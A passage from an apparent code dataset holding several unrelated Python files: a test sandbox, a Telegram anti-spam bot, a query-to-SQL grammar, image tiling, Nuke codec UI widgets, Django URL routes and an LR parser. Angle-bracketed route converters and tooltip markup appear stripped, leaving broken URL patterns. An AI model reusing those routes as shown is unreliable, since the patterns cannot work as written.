trace):\n super(SubprocessException, self).__init__(trace)\n\nclass ExceptionProcess(multiprocessing.Process):\n class Status():\n def __init__(self, exitcode, exception_tuple):\n self.exitcode = exitcode\n if exception_tuple is not None:\n self.trace = exception_tuple[1]\n self.exception = exception_tuple[0]\n else:\n self.exception = None\n self.trace = None\n\n def __init__(self, *args, **kwargs):\n multiprocessing.Process.__init__(self, *args, **kwargs)\n self._pconn, self._cconn = multiprocessing.Pipe()\n self._exception = None\n\n def run(self):\n try:\n super(ExceptionProcess, self).run()\n self._cconn.send(None)\n except Exception as e:\n tb = traceback.format_exc()\n self._cconn.send((e, tb))\n raise\n\n @property\n def status(self):\n if self._pconn.poll():\n self._exception = self._pconn.recv()\n \n return self.Status(self.exitcode, self._exception)\n\n\nclass Sandbox(object):\n def __init__(self, test_parameters):\n\n self.params = test_parameters\n self.io_manager = IoManager(self.params.test, self.params.suite)\n\n self.p = 
ExceptionProcess(target=self.entrypoint)\n self.p.daemon = True # Daemon + Join to not lock up main thread if something breaks\n self.io_manager.start_loggers()\n self.p.start()\n self.io_manager.close_parent_pipes()\n self.p.join()\n self.io_manager.join_loggers()\n\n status = self.p.status\n if status.exitcode:\n raise SubprocessException(status.exception, status.trace)\n\n def entrypoint(self):\n self.io_manager.setup()\n self.params.test.test(self.params)","repo_name":"spwilson2/flimsy","sub_path":"flimsy/sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34613057610","text":"import telegram, time, os, glob\r\nfrom telegram.ext import *\r\nfrom telegram import Update\r\nfrom difflib import SequenceMatcher\r\n\r\nTOKEN = \"YOUR TOKEN HERE\"\r\nSIMILARITY_RATE = 85\r\n\r\nasync def start_callback(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\r\n await update.message.reply_markdown_v2(\"Hey \\! Moi C'estCiaoBot\\. 🫡\\nAjoute moi dans un groupe ou un channel et *mets\\-moi administrateur*, je supprimerai les messages de scams selon\" +\r\n \" ma liste interne configurée\\.\\n📊 Taux de sensibilité configuré : \" + str(SIMILARITY_RATE) + \"%\")\r\n\r\nasync def analyze_msg(update, context):\r\n msg = update.effective_message\r\n text = msg.text\r\n for forbidden_text in retrieve_forbidden_messages():\r\n if get_string_similarity(forbidden_text, text) >= SIMILARITY_RATE:\r\n await msg.delete()\r\n print(\"- SPAM DETECTED - message removed\")\r\n user = msg.from_user\r\n if user is not None:\r\n print(\"-> User ID : \" + str(user.id))\r\n print(\"-> Username : \" + user.username)\r\n print(\"------------------------------\")\r\n\r\ndef retrieve_forbidden_messages():\r\n files = glob.glob(os.path.join(\"forbidden-messages\", \"*.txt\"))\r\n file_contents = []\r\n for file in files:\r\n with open(file, 'r', encoding=\"utf-8\") as f:\r\n content = f.read()\r\n file_contents.append(content)\r\n return file_contents\r\n\r\ndef get_string_similarity(string1, string2):\r\n matcher = SequenceMatcher(None, string1, string2)\r\n similarity = matcher.ratio() * 100\r\n return similarity\r\n\r\nif not os.path.exists(\"forbidden-messages\"):\r\n os.makedirs(\"forbidden-messages\")\r\n\r\napplication = Application.builder().token(TOKEN).build()\r\nprint(\"|----------------------------------------------|\")\r\nprint(\"| C'estCiaoBot CONNECTED - Created by KeyKatyu |\")\r\nprint(\"|------- https://github.com/KeyKatyu ----------|\")\r\nprint(\"|----------------------------------------------|\")\r\napplication.add_handler(CommandHandler(\"start\", start_callback))\r\napplication.add_handler(MessageHandler(filters.TEXT, analyze_msg))\r\napplication.run_polling()","repo_name":"KeyKatyu/cestciaobot","sub_path":"github-bot.py","file_name":"github-bot.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"36941115415","text":"\nimport tatsu\nimport json\n\nfrom gbd_core.database import Database, DatabaseException\n\nclass ParserException(Exception):\n pass\n\nclass Parser:\n GRAMMAR = r'''\n @@grammar::GBDQuery\n @@ignorecase::True\n\n start \n = \n q:query $ \n ;\n\n query \n = \n | left:query qop:(\"and\" | \"or\") ~ right:query \n | constraint \n | \"(\" q:query \")\" \n ;\n\n constraint \n = \n | col:(dbname \":\" column | column) cop:(\"=\" | \"!=\") str:string 
\n | col:(dbname \":\" column | column) cop:(\"=\" | \"!=\" | \"<=\" | \">=\" | \"<\" | \">\" ) ter:termstart\n | col:(dbname \":\" column | column) cop:(\"like\" | \"unlike\") ~ lik:([\"%\"] string [\"%\"])\n ;\n\n termstart \n = \n t:term\n ;\n\n term \n = \n | left:(term | termend) top:(\"+\" | \"-\" | \"*\" | \"/\") right:(term | termend)\n | (\"(\") t:(term | termend) (\")\")\n | constant:number\n ;\n\n termend\n =\n col:(dbname \":\" column | column)\n ;\n\n number = /[-]?[0-9]+[.]?[0-9]*/ ;\n string = /[a-zA-Z0-9_\\.\\-\\/\\,\\:\\+\\=\\@]+/ ;\n column = /[a-zA-Z][a-zA-Z0-9_]*/ ;\n dbname = /[a-zA-Z][a-zA-Z0-9_]*/ ;\n '''\n\n\n model = tatsu.compile(GRAMMAR)\n\n\n def __init__(self, query, verbose=False):\n try:\n self.ast = Parser.model.parse(query) if query else dict()\n if verbose:\n print(\"Parsed: \" + query)\n print(json.dumps(tatsu.util.asjson(self.ast), indent=2))\n except tatsu.exceptions.FailedParse as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n except tatsu.exceptions.FailedLeftRecursion as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n\n\n def get_features(self, ast=None):\n #import pprint\n #pp = pprint.PrettyPrinter(depth=6)\n #pp.pprint(ast)\n try:\n ast = ast if ast else self.ast\n if \"q\" in ast:\n return self.get_features(ast[\"q\"])\n elif \"t\" in ast:\n return self.get_features(ast[\"t\"])\n elif \"qop\" in ast or \"top\" in ast:\n return self.get_features(ast[\"left\"]) | self.get_features(ast[\"right\"])\n elif \"cop\" in ast and \"ter\" in ast:\n return { \"\".join(ast[\"col\"]) } | self.get_features(ast[\"ter\"])\n elif \"col\" in ast:\n return { \"\".join(ast[\"col\"]) }\n else: \n return set()\n except TypeError as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n\n\n def get_sql(self, db: Database, ast=None):\n try:\n ast = ast if ast else self.ast\n if \"q\" in ast:\n return \"(\" + self.get_sql(db, ast[\"q\"]) + \")\"\n elif \"t\" in ast:\n return \"(\" + self.get_sql(db, ast[\"t\"]) + \")\"\n elif \"qop\" in ast or \"top\" in ast: # query operator or term operator\n operator = ast[\"qop\"] if ast[\"qop\"] else ast[\"top\"]\n left = self.get_sql(db, ast[\"left\"])\n right = self.get_sql(db, ast[\"right\"])\n return \"{} {} {}\".format(left, operator, right)\n elif \"cop\" in ast: # constraint operator\n operator = \"not like\" if ast[\"cop\"] == \"unlike\" else ast[\"cop\"]\n feat = db.faddr(\"\".join(ast[\"col\"]))\n feat_is_1_n = db.find(\"\".join(ast[\"col\"])).default is None\n if \"str\" in ast: # cop:(\"=\" | \"!=\")\n if feat_is_1_n:\n table = db.faddr_table(\"\".join(ast[\"col\"]))\n setop = \"IN\" if ast[\"cop\"] == \"=\" else \"NOT IN\"\n return \"{t}.hash {o} (SELECT {t}.hash FROM {t} WHERE {f} = '{s}')\".format(o=setop, t=table, f=feat, s=ast[\"str\"])\n else:\n return \"{} {} '{}'\".format(feat, operator, ast[\"str\"])\n elif \"lik\" in ast: # cop:(\"like\" | \"unlike\")\n if feat_is_1_n:\n table = db.faddr_table(\"\".join(ast[\"col\"]))\n setop = \"IN\" if ast[\"cop\"] == \"like\" else \"NOT IN\"\n return \"{t}.hash {o} (SELECT {t}.hash FROM {t} WHERE {f} like '{s}')\".format(o=setop, t=table, f=feat, s=\"\".join([ t for t in ast[\"lik\"] if t ]))\n else:\n return \"{} {} '{}'\".format(feat, operator, \"\".join([ t for t in ast[\"lik\"] if t ]))\n elif \"ter\" in ast: # cop:(\"=\" | \"!=\" | \"<=\" | \">=\" | \"<\" | \">\" )\n if feat_is_1_n and ast[\"cop\"] == \"!=\":\n table = db.faddr_table(\"\".join(ast[\"col\"]))\n setop = \"NOT IN\" if ast[\"cop\"] == 
\"!=\" else \"IN\"\n cop = \"=\" if ast[\"cop\"] == \"!=\" else ast[\"cop\"]\n return \"{t}.hash {o} (SELECT {t}.hash FROM {t} WHERE CAST({f} AS FLOAT) {c} {s})\".format(o=setop, c=cop, t=table, f=feat, s=self.get_sql(db, ast[\"ter\"]))\n else:\n return \"CAST({} AS FLOAT) {} {}\".format(feat, operator, self.get_sql(db, ast[\"ter\"]))\n raise ParserException(\"Missing right-hand side of constraint\")\n elif \"col\" in ast:\n feature = db.faddr(\"\".join(ast[\"col\"]))\n return \"CAST({} AS FLOAT)\".format(feature)\n elif \"constant\" in ast:\n return ast[\"constant\"]\n else:\n return \"1=1\"\n except TypeError as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n except DatabaseException as e:\n raise ParserException(\"Failed to parse query: {}\".format(str(e)))\n\n","repo_name":"Udopia/gbd","sub_path":"gbd_core/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"68"} +{"seq_id":"5488217719","text":"# Import necessary libraries\r\nimport os\r\nfrom PIL import Image\r\nfrom osgeo import gdal\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\n# Set the input and output directories\r\ninput_dir = r\"C:\\Users\\Administrator\\Desktop\\tif_dataset\\airport_MUX\"\r\noutput_dir = r\"C:\\Users\\Administrator\\Desktop\\tif_dataset\\OUTPUT\"\r\n\r\n# Set the desired size of each sub-image\r\nsub_image_size = 128\r\n\r\n# Loop through each TIFF image in the input directory\r\nfor filename in os.listdir(input_dir):\r\n if filename.endswith('.tif'):\r\n # Open the image using PIL\r\n image = cv2.imread(os.path.join(input_dir, filename))\r\n dataset = gdal.Open(os.path.join(input_dir, filename))\r\n geotransform = dataset.GetGeoTransform()\r\n print(\"------------------------\",os.path.join(input_dir,filename))\r\n print(geotransform)\r\n # Calculate the coordinates of the four corners of the image\r\n # ulx = geotransform[0]\r\n # uly = geotransform[3]\r\n # Get the dimensions of the image\r\n cols=dataset.RasterXSize\r\n rows=dataset.RasterYSize\r\n \r\n # Calculate the number of sub-images in each dimension\r\n num_tiles_cols =int(np.ceil(cols/sub_image_size))\r\n num_tiles_rows =int(np.ceil(rows/sub_image_size))\r\n\r\n # 创建一个大的数组容纳图像,如果边界不够则填充\r\n # 1。计算填充的边界\r\n pad_cols=num_tiles_cols*sub_image_size-cols\r\n pad_rows=num_tiles_rows*sub_image_size-rows\r\n\r\n img_arr=np.array(image)\r\n\r\n new_img_arr=np.zeros((int(rows+pad_rows),int(cols+pad_cols),3),dtype=img_arr.dtype)\r\n\r\n # 将原始图像平移并保存在新的数组\r\n new_img_arr[0:rows,0:cols,]=img_arr\r\n print('rows:',rows,'\\t','cols:',cols) \r\n # Loop through each sub-image\r\n for i in range(0,rows,sub_image_size):\r\n num=0\r\n for j in range(0,cols,sub_image_size):\r\n print('i:',i,'\\t','j:',j,'\\t','num:',num)\r\n # Calculate the coordinates of the sub-image\r\n x_left=dataset.GetGeoTransform()[0]+j*dataset.GetGeoTransform()[1]\r\n y_top=dataset.GetGeoTransform()[3]+j*dataset.GetGeoTransform()[5]\r\n print((x_left,y_top,geotransform[1]))\r\n # Crop the sub-image using PIL\r\n # sub_image = image.crop((left, upper, right, lower))\r\n block=new_img_arr[i:i+sub_image_size,j:j+sub_image_size]\r\n\r\n #保存块\r\n tile_img=Image.fromarray(block)\r\n \r\n # Save the sub-image as a TIFF file\r\n sub_image_filename = os.path.splitext(filename)[0] + '_{}_{}_{}.tiff'.format(x_left,y_top,geotransform[1])\r\n tile_img.save(os.path.join(output_dir, sub_image_filename))\r\n 
num=num+1","repo_name":"ArcFYB/2JPG_Tools","sub_path":"tiff_split_saveinfo.py","file_name":"tiff_split_saveinfo.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19634769076","text":"import copy\n\nimport nuke_internal as nuke\nimport PySide2.QtCore as QtCore\nimport PySide2.QtWidgets as QtWidgets\nfrom hiero.ui.FnUIProperty import UIPropertyFactory\nfrom hiero.ui.FnTaskUIFormLayout import TaskUIFormLayout\nfrom hiero.ui.FnNodePropertyWidget import NodePropertyWidget\n\nkEXRTooltips = {\n 'metadata': ('Which metadata to write out to the EXR file.'\n \"

        'no metadata' means that no custom attributes will be created and only metadata that fills required header fields will be written.\\n\\n        'default metadata' means that the optional timecode, edgecode, frame rate and exposure header fields will also be filled using metadata values.\"),\n 'noprefix': (\"By default unknown metadata keys have the prefix 'nuke' attached to them before writing them into the file. Enable this option to write the metadata 'as is' without the nuke prefix.\"),\n 'interleave': ('Which groups to interleave in the EXR data.'\n \"\\n\\n        'interleave channels, layers and views' for backwards compatibility. \"\n 'This writes all the channels to a single part ensuring compatibility with earlier versions of Nuke.\\n\\n        '\n \"\\n\\n        'interleave channels and layers' for forwards compatibility. \"\n 'This creates a multi-part file optimised for size.\\n\\n        '\n \"\\n\\n        'interleave channels' to resolve layers into separate parts. \"\n 'This creates a multi-part file optimized for read performance.\\n
        '\n 'For full compatibility with versions of Nuke using OpenEXR 1.x '\n \"'truncate channel names' should be used to ensure that channels \"\n 'do not overflow the name buffer.'),\n 'standard_layer_name_format': ('Older versions of Nuke write out channel names in the format: view.layer.channel. '\n 'Check this option to follow the EXR standard format: layer.view.channel'),\n 'write_full_layer_names': ('Older versions of Nuke just stored the layer name in the part '\n 'name of multi-part files. Check this option to always write the '\n 'layer name in the channel names following the EXR standard.'),\n 'truncateChannelNames': ('Truncate channel names to a maximum of 31 characters for backwards compatibility'),\n 'write_ACES_compliant_EXR': ('Write out an ACES compliant EXR file')\n\n}\n# Tooltips for codec properties. Currently only some of the mov encoder property tooltips are defined.\nkCodecTooltips = {\n 'exr': kEXRTooltips\n}\n\n\nclass CodecUIController(QtWidgets.QWidget):\n \"\"\"CodecUIController is the base class used to control the widgets for specific Codecs.\n This allows to customize layout of the widgets and signals and slots\"\"\"\n propertyChanged = QtCore.Signal()\n\n def __init__(self, file_type, propertyDictionaries, presetDictionary):\n QtWidgets.QWidget.__init__(self)\n self._file_type = file_type\n self._widgets = []\n self.initializeUI(propertyDictionaries, presetDictionary)\n\n def connectProperty(self, propertyWidget):\n \"\"\"reimplement this to allow setup custom signals and slots\"\"\"\n propertyWidget.propertyChanged.connect(self.propertyChanged)\n\n def getTooltip(self, label, propertyKey):\n # Create the tooltip. This matches how tooltips appear from knob widgets. Adding the HTML markup\n # also has the effect of making Qt apply wrapping to the text.\n tooltip = '' + label + ''\n tooltipsForCodec = kCodecTooltips.get(self._file_type, dict())\n propertyTooltip = tooltipsForCodec.get(propertyKey, None)\n if propertyTooltip is not None:\n tooltip = tooltip + '
        ' + propertyTooltip\n return tooltip\n\n def getLabelAndProperty(self, propertyKey):\n label = propertyKey\n # If key is not a string, assume its a tupe containing (label, key)\n if not isinstance(propertyKey, str):\n label, propertyKey = propertyKey\n return label, propertyKey\n\n def initializeUI(self, propertyDictionaries, presetDictionary):\n \"\"\"Creates all the properties from the propertyDictionaries\"\"\"\n layout = TaskUIFormLayout()\n self.setLayout(layout)\n for properties in propertyDictionaries:\n # Flatten dictionary into tupes of keyvalue pairs\n for (propertyKey, propertyValue) in properties.items():\n label, propertyKey = self.getLabelAndProperty(propertyKey)\n tooltip = self.getTooltip(label, propertyKey)\n propertyWidget = UIPropertyFactory.create(type(\n propertyValue), key=propertyKey, value=propertyValue, dictionary=presetDictionary, label=label, tooltip=tooltip)\n if propertyWidget is not None:\n # Force the widget to commit its value back to the preset. This\n # ensures that the property values are stored in the preset even if\n # the user hasn't changed them from the defaults. Mixing this with\n # the UI is not ideal, but the property widgets do already have all\n # the logic for determining the defaults and writing them to the\n # preset.\n propertyWidget.update(commit=True)\n self.connectProperty(propertyWidget)\n layout.addRow(propertyWidget._label + ':', propertyWidget)\n\n\nclass EXRCodecUIController(CodecUIController):\n kDataType = 'datatype'\n kCompression = 'compression'\n kCompressionLevel = 'dw_compression_level'\n kMetadata = 'metadata'\n kPrefix = 'noprefix'\n kInterleave = 'interleave'\n kLayerNameFormat = 'standard_layer_name_format'\n kFullLayerNames = 'write_full_layer_names'\n kTruncateChannelNames = 'truncateChannelNames'\n kWriteACESCompliantEXR = 'write_ACES_compliant_EXR'\n\n def __init__(self, file_type, propertyDictionaries, presetDictionary):\n CodecUIController.__init__(self, 'exr', propertyDictionaries, presetDictionary)\n\n def createProperty(self, properties, propertyKey, presetDictionary):\n label, propertyValue = properties[propertyKey]\n tooltip = self.getTooltip(label, propertyKey)\n propertyWidget = UIPropertyFactory.create(type(\n propertyValue), key=propertyKey, value=propertyValue, dictionary=presetDictionary, label=label, tooltip=tooltip)\n propertyWidget.update(commit=True)\n self.connectProperty(propertyWidget)\n return propertyWidget\n\n def initializeUI(self, propertyDictionaries, presetDictionary):\n \"\"\"Creates all the properties from the propertyDictionaries\"\"\"\n properties = dict()\n # construct a dictionary of tuples (label,propertyValue)\n for prop in propertyDictionaries:\n # Flatten dictionary into tupes of keyvalue pairs\n for (propertyKey, propertyValue) in prop.items():\n label, propertyKey = self.getLabelAndProperty(propertyKey)\n properties[propertyKey] = (label, propertyValue)\n\n layout = TaskUIFormLayout()\n self.setLayout(layout)\n\n # datatype\n widget = self.createProperty(properties, self.kDataType, presetDictionary)\n layout.addRow(widget._label + ':', widget)\n\n # compression\n widget = self.createProperty(properties, self.kCompression, presetDictionary)\n layout.addRow(widget._label + ':', widget)\n self._compressionWidget = widget\n\n widget = self.createProperty(properties, self.kCompressionLevel, presetDictionary)\n layout.addRow(widget._label + ':', widget)\n self._compressionLevelWidget = widget\n self.compressionChanged()\n\n # metadata\n self._writeACESCompliantEXRWidget = 
self.createProperty(\n properties, self.kWriteACESCompliantEXR, presetDictionary)\n layout.addRow(self._writeACESCompliantEXRWidget._label +\n ':', self._writeACESCompliantEXRWidget)\n\n metadataWidget = self.createProperty(properties, self.kMetadata, presetDictionary)\n prefixWidget = self.createProperty(properties, self.kPrefix, presetDictionary)\n self._metadataWidget = metadataWidget\n self._prefixWidget = prefixWidget\n layout.addMultiWidgetRow((metadataWidget._label, prefixWidget._label),\n (metadataWidget, prefixWidget))\n self.metadataChanged()\n\n # interleaving\n self._interleavingWidget = self.createProperty(\n properties, self.kInterleave, presetDictionary)\n self._standardLayerNameWidget = self.createProperty(\n properties, self.kLayerNameFormat, presetDictionary)\n self._fullLayerNamesWidget = self.createProperty(\n properties, self.kFullLayerNames, presetDictionary)\n self._truncateLayerNamesWidget = self.createProperty(\n properties, self.kTruncateChannelNames, presetDictionary)\n layout.addRow(self._interleavingWidget._label+':', self._interleavingWidget)\n layout.addRow(self._standardLayerNameWidget._label +\n ':', self._standardLayerNameWidget)\n layout.addRow(self._fullLayerNamesWidget._label+':', self._fullLayerNamesWidget)\n layout.addRow(self._truncateLayerNamesWidget._label +\n ':', self._truncateLayerNamesWidget)\n self.interleaveChanged()\n\n # Slots\n\n def compressionChanged(self):\n layout = self.layout()\n text = self._compressionWidget._widget.currentText()\n if 'DWA' in text:\n layout.setWidgetVisible(self._compressionLevelWidget, True)\n else:\n layout.setWidgetVisible(self._compressionLevelWidget, False)\n self.propertyChanged.emit()\n\n def interleaveChanged(self):\n layout = self.layout()\n index = self._interleavingWidget._widget.currentIndex()\n if index == 0:\n layout.setWidgetEnabled(self._standardLayerNameWidget, True)\n layout.setWidgetEnabled(self._fullLayerNamesWidget, False)\n layout.setWidgetEnabled(self._truncateLayerNamesWidget, True)\n elif index == 1:\n layout.setWidgetEnabled(self._standardLayerNameWidget, True)\n layout.setWidgetEnabled(self._fullLayerNamesWidget, False)\n layout.setWidgetEnabled(self._truncateLayerNamesWidget, False)\n elif index == 2:\n layout.setWidgetEnabled(self._standardLayerNameWidget, True)\n layout.setWidgetEnabled(self._fullLayerNamesWidget, True)\n layout.setWidgetEnabled(self._truncateLayerNamesWidget, False)\n self.propertyChanged.emit()\n\n def metadataChanged(self):\n layout = self.layout()\n text = self._metadataWidget._widget.currentText()\n if 'all' in text:\n layout.setWidgetEnabled(self._prefixWidget, True)\n else:\n layout.setWidgetEnabled(self._prefixWidget, False)\n self.propertyChanged.emit()\n\n def connectProperty(self, propertyWidget):\n if propertyWidget._label == 'compression':\n propertyWidget.propertyChanged.connect(self.compressionChanged)\n elif propertyWidget._label == 'interleave':\n propertyWidget.propertyChanged.connect(self.interleaveChanged)\n elif propertyWidget._label == 'metadata':\n propertyWidget.propertyChanged.connect(self.metadataChanged)\n else:\n propertyWidget.propertyChanged.connect(self.propertyChanged)\n\n\nclass WriteNodePropertyWidget(NodePropertyWidget):\n \"\"\"NodePropertyWidget subclass that creates property widgets for a write node with the\n passed in fileType.\"\"\"\n\n def __init__(self, fileType, propertyDictionaries, presetDictionary):\n self._writeNode = nuke.createNode('Write', '', False)\n fileTypeKnob = self._writeNode.knobs()['file_type']\n 
fileTypeKnob.setValue(fileType)\n\n NodePropertyWidget.__init__(self, self._writeNode,\n propertyDictionaries, presetDictionary)\n\n def __del__(self):\n nuke.delete(self._writeNode)\n","repo_name":"sisoe24/nuke-python-stubs","sub_path":"stubs/hiero/ui/FnCodecUIController.py","file_name":"FnCodecUIController.py","file_ext":"py","file_size_in_byte":12143,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"21029286595","text":"from django.conf import settings\nfrom django.urls import path, register_converter\n\nfrom grandchallenge.serving.views import (\n serve_component_interface_value,\n serve_images,\n serve_session_feedback_screenshot,\n serve_structured_challenge_submission_form,\n serve_submissions,\n)\n\napp_name = \"serving\"\n\n\nclass PrefixConverter:\n regex = r\"[0-9a-fA-F]{2}\"\n\n def to_python(self, value):\n return str(value)\n\n def to_url(self, value):\n return str(value)\n\n\nregister_converter(PrefixConverter, \"prefix\")\n\nurlpatterns = [\n path(\n f\"{settings.IMAGE_FILES_SUBDIRECTORY}//\",\n serve_images,\n ),\n path(\n f\"{settings.IMAGE_FILES_SUBDIRECTORY}////\",\n serve_images,\n ),\n path(\n (\n f\"{settings.EVALUATION_FILES_SUBDIRECTORY}/\"\n f\"/\"\n f\"submissions/\"\n f\"/\"\n f\"/\"\n f\"\"\n ),\n serve_submissions,\n ),\n path(\n (\n f\"{settings.COMPONENTS_FILES_SUBDIRECTORY}/\"\n f\"componentinterfacevalue/\"\n f\"/\"\n f\"/\"\n f\"/\"\n f\"\"\n ),\n serve_component_interface_value,\n ),\n path(\n (\n \"challenges/\"\n \"challengerequest/\"\n \"/\"\n \"\"\n ),\n serve_structured_challenge_submission_form,\n ),\n path(\n \"session-feedback//\",\n serve_session_feedback_screenshot,\n ),\n]\n","repo_name":"comic/grand-challenge.org","sub_path":"app/grandchallenge/serving/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"68"} +{"seq_id":"71356367577","text":"\"\"\"\nSimple algorithm that re-implements the Segmentor segment function\n\nThis module is a placeholder to indicate how to use the segmentation\nplugin architecture.\n\"\"\"\nfrom __future__ import print_function, absolute_import\nfrom DVIDSparkServices.reconutils.Segmentor import Segmentor\n\nclass precomputedpipeline(Segmentor):\n\n def segment(self, subvols, gray_vols=None):\n \"\"\"\n Does not require the gray vols\n \"\"\"\n # read pre-computed segmentation\n\n pathloc = self.segmentor_config[\"segpath\"]\n \n def _segment(subvolume):\n z1 = subvolume.box.z1\n y1 = subvolume.box.y1\n x1 = subvolume.box.x1\n\n fileloc = (pathloc + \"/%d_%d_%d.h5\") % (z1,y1,x1)\n import h5py\n import numpy\n print(\"!!\", fileloc)\n try:\n hfile = h5py.File(fileloc, 'r')\n seg = numpy.array(hfile[\"segmentation\"])\n print(\"!! good\")\n return seg.astype(numpy.uint32)\n except:\n print(\"!! 
bad\")\n return numpy.zeros((552,552,552), numpy.uint32)\n\n # preserver partitioner\n return subvols.map(_segment, True)\n","repo_name":"janelia-flyem/DVIDSparkServices","sub_path":"DVIDSparkServices/reconutils/plugins/precomputedpipeline.py","file_name":"precomputedpipeline.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"68"} +{"seq_id":"1778062245","text":"import logging\nfrom .baselex import EPS, EOF\nfrom ..common import Token\nfrom .common import ParserException, ParserGenerationException\n\n\nclass Action:\n def __eq__(self, other):\n return str(self) == str(other)\n\n\nclass Shift(Action):\n \"\"\" Shift over the next token and go to the given state \"\"\"\n\n def __init__(self, to_state):\n self.to_state = to_state\n\n def __repr__(self):\n return \"Shift({})\".format(self.to_state)\n\n\nclass Reduce(Action):\n \"\"\" Reduce according to the given rule \"\"\"\n\n def __init__(self, rule):\n self.rule = rule\n\n def __repr__(self):\n return \"Reduce({})\".format(self.rule)\n\n\nclass Accept(Action):\n def __init__(self, rule):\n self.rule = rule\n\n def __repr__(self):\n return \"Accept({})\".format(self.rule)\n\n\nclass Item:\n \"\"\"\n Represents a partially parsed item\n It has a production it is looking for, a position\n in this production called the 'dot' and a look ahead\n symbol that must follow this item.\n \"\"\"\n\n def __init__(self, production, dotpos, look_ahead):\n self.production = production\n self.dotpos = dotpos\n assert self.dotpos <= len(self.production.symbols)\n self.look_ahead = look_ahead\n self.is_shift = self.dotpos < len(self.production.symbols)\n if self.is_shift:\n self.Next = self.production.symbols[self.dotpos]\n self._data = (self.production, self.dotpos, self.look_ahead)\n self._hash = self._data.__hash__()\n\n def __eq__(self, other):\n if type(other) is type(self):\n return self._data == other._data\n return False\n\n def __hash__(self):\n return self._hash\n\n @property\n def is_reduce(self):\n \"\"\" Check if this item has the dot at the end \"\"\"\n return not self.is_shift\n\n def can_shift_over(self, symbol):\n \"\"\" Determines if this item can shift over the given symbol \"\"\"\n return self.is_shift and self.Next == symbol\n\n def shifted(self):\n \"\"\" Creates a new item that is shifted one position \"\"\"\n return Item(self.production, self.dotpos + 1, self.look_ahead)\n\n @property\n def NextNext(self):\n \"\"\" Gets the symbol after the next symbol, or EPS if at the end \"\"\"\n if self.dotpos + 1 >= len(self.production.symbols):\n return EPS\n else:\n return self.production.symbols[self.dotpos + 1]\n\n def __repr__(self):\n prod = self.production\n predot = \" \".join(prod.symbols[0 : self.dotpos])\n postdot = \" \".join(prod.symbols[self.dotpos :])\n args = (prod.name, predot, postdot, self.look_ahead)\n return \"[{} -> {} . {} -> {}]\".format(*args)\n\n\nclass State:\n \"\"\"A state in the parsing machine. A state contains a set of items and\n a state number\"\"\"\n\n def __init__(self, items, number):\n self.items = items\n self.number = number\n self.actions = {}\n\n\nclass LrParser:\n \"\"\"LR parser automata. 
This class takes goto and action table\n and can then process a sequence of tokens.\n \"\"\"\n\n def __init__(self, grammar, action_table, goto_table):\n self.action_table = action_table\n self.goto_table = goto_table\n self.grammar = grammar\n\n def parse(self, lexer):\n \"\"\" Parse an iterable with tokens \"\"\"\n assert hasattr(lexer, \"next_token\")\n stack = [0]\n r_data_stack = []\n look_ahead = lexer.next_token()\n assert type(look_ahead) is Token\n\n # TODO: exit on this condition:\n while stack != [0, self.grammar.start_symbol, 0]:\n state = stack[-1] # top of stack\n key = (state, look_ahead.typ)\n if key not in self.action_table:\n raise ParserException(\n \"Error parsing at character {0}\".format(look_ahead)\n )\n action = self.action_table[key]\n if isinstance(action, Reduce):\n f_args = []\n prod = self.grammar.productions[action.rule]\n for s in prod.symbols:\n stack.pop()\n stack.pop()\n f_args.append(r_data_stack.pop())\n f_args.reverse()\n r_data = None\n if prod.f:\n r_data = prod.f(*f_args)\n state = stack[-1]\n stack.append(prod.name)\n stack.append(self.goto_table[(state, prod.name)])\n r_data_stack.append(r_data)\n elif isinstance(action, Shift):\n stack.append(look_ahead.typ)\n stack.append(action.to_state)\n r_data_stack.append(look_ahead)\n look_ahead = lexer.next_token()\n assert type(look_ahead) is Token\n elif isinstance(action, Accept):\n # Pop last rule data off the stack:\n f_args = []\n param = self.grammar.productions[action.rule]\n for s in param.symbols:\n stack.pop()\n stack.pop()\n f_args.append(r_data_stack.pop())\n f_args.reverse()\n if param.f:\n ret_val = param.f(*f_args)\n else:\n ret_val = None\n # Break out!\n stack.append(param.name)\n stack.append(0)\n break\n # At exit, the stack must be 1 long\n # TODO: fix that this holds:\n # assert stack == [0, self.grammar.start_symbol, 0]\n return ret_val\n\n\ndef calculate_first_sets(grammar):\n \"\"\"\n Calculate first sets for each grammar symbol\n This is a dictionary which maps each grammar symbol\n to a set of terminals that can be encountered first\n when looking for the symbol.\n \"\"\"\n first = {}\n nullable = {}\n for terminal in grammar.terminals | {EOF, EPS}:\n first[terminal] = set([terminal])\n nullable[terminal] = False\n\n for nt in grammar.nonterminals:\n first[nt] = set()\n nullable[nt] = False\n\n while True:\n some_change = False\n for rule in grammar.productions:\n # Check for null-ability:\n if all(nullable[beta] for beta in rule.symbols):\n if not nullable[rule.name]:\n nullable[rule.name] = True\n some_change = True\n\n # Update first sets:\n for beta in rule.symbols:\n if not nullable[beta]:\n if first[beta] - first[rule.name]:\n first[rule.name] |= first[beta]\n some_change = True\n break\n if not some_change:\n break\n return first\n\n\nclass LrParserBuilder:\n \"\"\"\n Construct goto and action tables according to LALR algorithm\n \"\"\"\n\n def __init__(self, grammar):\n self.logger = logging.getLogger(\"pcc\")\n self.grammar = grammar\n self._first = None # Cached first set\n\n # Work data structures:\n self.action_table = {}\n self.goto_table = {}\n\n @property\n def first(self):\n \"\"\"\n The first set is a mapping from a grammar 